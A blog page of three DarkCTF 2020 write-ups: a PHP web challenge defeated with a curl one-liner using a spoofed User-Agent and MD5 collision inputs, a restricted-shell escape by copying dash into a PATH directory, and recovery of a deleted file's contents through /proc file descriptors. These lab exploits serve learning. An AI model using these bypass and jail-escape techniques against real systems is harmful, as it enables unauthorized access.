Cookie Consent by

Latest entries | Category CTF | Page 3


DarkCTF 2020: Web/PHP Information

Web/PHP Information

198 points

Let's test your php knowledge.

Flag Format: DarkCTF{}

Corona Web


We started with some php code:

<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Corona Web</title>

            background-color: whitesmoke

include "flag.php";

echo show_source("index.php");

if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";

if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";

    if (isset($_GET['karma']) and isset($_GET['2020'])) {
        if ($_GET['karma'] != $_GET['2020'])
        if (md5($_GET['karma']) == md5($_GET['2020']))
            echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
            echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";


There are bunch of ifs, that needs to be defeated before getting the flag:

- darkctf parameter must be set to 2020
- User-Agent must be set to 2020_the_best_year_corona (it came from base64 decoded string MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==)
- ctf2020 parameter must be set to WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09 (it's base64 encoded (not decoded!!) string ZGFya2N0Zi0yMDIwLXdlYg==)
- and the most tricky one, karma and 2020 parameters must not be equal, but their md5 hashes needs to be the same, so we need to use strings which are affected by hash collision

I've used the hexcodes for the karma and 2020 parameters and decoded them into right strings with xxd on the fly, because bash is not doing well with nonprintable characters. Flag has been conquered with following oneliner:

curl -H "User-Agent: 2020_the_best_year_corona" -G --data-urlencode "karma=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f8955ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5bd8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70" | xxd -p -r`" --data-urlencode "2020=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f8955ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5bd8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70" | xxd -p -r`" "" --verbose


DarkCTF 2020: Linux/linux starter

Linux/linux starter

101 points

Don't Try to break this jail

ssh [email protected] -p 8001 password : wolfie


The challenge was to escape jail/restricted shell.

I’ve found, that PATH environment variable contains /home/wolfie/bin:/home/wolfie/.local/bin:/root/bin

So, I’ve simply scp the dash shell into /home/wolfie/.local/bin/

Then, I was able to execute my own shell and find flag in the seconds.


DarkCTF 2020: Linux/Find-Me


321 points

Mr.Wolf was doing some work and he accidentally deleted the important file can you help him and read the file?

Note: All players will get individual container.

ssh [email protected] -p 10000 password: wolfie


Let's have a look what accidently deleted files we can find ;-)

ps aux
cd /proc/10/fd
cat 3

Some password, but what for?

Let’s see what users do we have on this box.

getent passwd

Password seems to be accurate.

So, where’s the flag?

Reversing the text gave me the flag…